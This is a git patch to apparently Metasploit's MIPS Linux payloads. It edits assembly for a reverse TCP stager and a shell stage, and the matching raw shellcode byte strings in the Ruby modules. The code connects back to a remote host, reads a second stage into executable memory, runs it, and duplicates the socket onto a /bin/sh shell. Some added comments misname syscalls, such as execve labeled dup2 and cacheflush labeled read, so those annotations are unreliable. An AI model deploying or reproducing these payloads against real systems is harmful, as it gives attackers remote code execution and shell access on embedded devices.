From a056d937e7f03c463b9c5d056997eff648404039 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 14 Jan 2014 14:06:01 -0600 Subject: [PATCH] Fluch data cache and improve documentation --- .../shellcode/linux/mips/stage_tcp_shell.s | 4 +++- .../linux/mipsbe/stager_sock_reverse.s | 18 +++++++++++++++++- .../linux/mipsle/stager_sock_reverse.s | 18 +++++++++++++++++- .../stagers/linux/mipsbe/reverse_tcp.rb | 2 ++ .../stagers/linux/mipsle/reverse_tcp.rb | 2 ++ 5 files changed, 41 insertions(+), 3 deletions(-) diff --git a/external/source/shellcode/linux/mips/stage_tcp_shell.s b/external/source/shellcode/linux/mips/stage_tcp_shell.s index f9c6826223..bbe9086fe5 100644 --- a/external/source/shellcode/linux/mips/stage_tcp_shell.s +++ b/external/source/shellcode/linux/mips/stage_tcp_shell.s @@ -41,6 +41,7 @@ main: # dup2(sockfd, 0) # a0: oldfd (sockfd) # a1: newfd (2, 1, 0) + # v0: syscall = __NR_dup2 (4063) li $s1, -3 nor $s1, $s1, $zero add $a0, $s2, $zero @@ -50,12 +51,13 @@ dup2_loop: syscall 0x40404 li $s0, -1 addi $s1, $s1, -1 - bne $s1, $s0, dup2_loop # + bne $s1, $s0, dup2_loop # # execve("/bin/sh", ["/bin/sh"], NULL) # a0: filename "/bin/sh" # a1: argv ["/bin/sh", NULL] # a2: envp NULL + # v0: syscall = __NR_dup2 (4011) li $t8, -1 # load t8 with -1 getaddr: # getaddr trick from scut@team-teso.net bltzal $t8, getaddr # branch with $ra stored if t8 < 0 diff --git a/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s index 2edc183001..9aba45eea7 100644 --- a/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s +++ b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s @@ -13,7 +13,7 @@ # # Description: # -# Implementation of a MIPS LE Linux reverse TCP stager. +# Implementation of a MIPS BE Linux reverse TCP stager. # # File descriptor in $s2. # @@ -53,6 +53,7 @@ main: # a0: sockfd # a1: addr = AF_INET (2) # a2: addrlen = 16 + # v0: syscall = __NR_connect (4170) lw $a0, -4($sp) li $t7, -3 nor $t7, $t7, $zero @@ -75,6 +76,7 @@ main: # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) # sp(16): fd = -1 # sp(20): offset = 0 + # v0: syscall = __NR_mmap (4090) li $a0, -1 li $a1, 4097 addi $a1, $a1, -1 @@ -95,12 +97,26 @@ main: # a0: sockfd # a1: addr # a2: len = 4096 + # v0: syscall = __NR_read (4003) lw $a0, -4($sp) lw $a1, -8($sp) li $a2, 4097 addi $a2, $a2, -1 li $v0, 4003 syscall 0x40404 + + # cacheflush(addr, nbytes, DCACHE) + # a0: addr + # a1: nbytes + # a2: cache = DCACHE (2) + # v0: syscall = __NR_read (4147) + lw $a0, -8($sp) + add $a1, $v0, $zero + li $t1, -3 + nor $t1, $t1, $0 + add $a2, $t1, $0 + li $v0, 4147 + syscall 0x40404 # jmp to the stage lw $s1, -8($sp) diff --git a/external/source/shellcode/linux/mipsle/stager_sock_reverse.s b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s index ac6863afb9..42083452af 100644 --- a/external/source/shellcode/linux/mipsle/stager_sock_reverse.s +++ b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s @@ -53,6 +53,7 @@ main: # a0: sockfd # a1: addr = AF_INET (2) # a2: addrlen = 16 + # v0: syscall = __NR_connect (4170) lw $a0, -4($sp) li $t7, -3 nor $t7, $t7, $zero @@ -75,6 +76,7 @@ main: # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) # sp(16): fd = -1 # sp(20): offset = 0 + # v0: syscall = __NR_mmap (4090) li $a0, -1 li $a1, 4097 addi $a1, $a1, -1 @@ -95,16 +97,30 @@ main: # a0: sockfd # a1: addr # a2: len = 4096 + # v0: syscall = __NR_read (4003) lw $a0, -4($sp) lw $a1, -8($sp) li $a2, 4097 addi $a2, $a2, -1 li $v0, 4003 syscall 0x40404 + + # cacheflush(addr, nbytes, DCACHE) + # a0: addr + # a1: nbytes + # a2: cache = DCACHE (2) + # v0: syscall = __NR_read (4147) + lw $a0, -8($sp) + add $a1, $v0, $zero + li $t1, -3 + nor $t1, $t1, $0 + add $a2, $t1, $0 + li $v0, 4147 + syscall 0x40404 # jmp to the stage lw $s1, -8($sp) - lw $s2, -4($sp) + lw $s2, -4($sp) # sockfd saved on $s2 jalr $s1 .set macro diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb index 7bd9d256d4..4dd0c08440 100644 --- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb @@ -45,6 +45,8 @@ module Metasploit3 "\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" + "\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" + "\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" + + "\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" + + "\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" + "\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" + "\xf8\x09" } diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb index 9e57739329..9b123da4bb 100644 --- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb @@ -45,6 +45,8 @@ module Metasploit3 "\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" + "\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" + "\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" + + "\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" + + "\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" + "\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" + "\x20\x02" }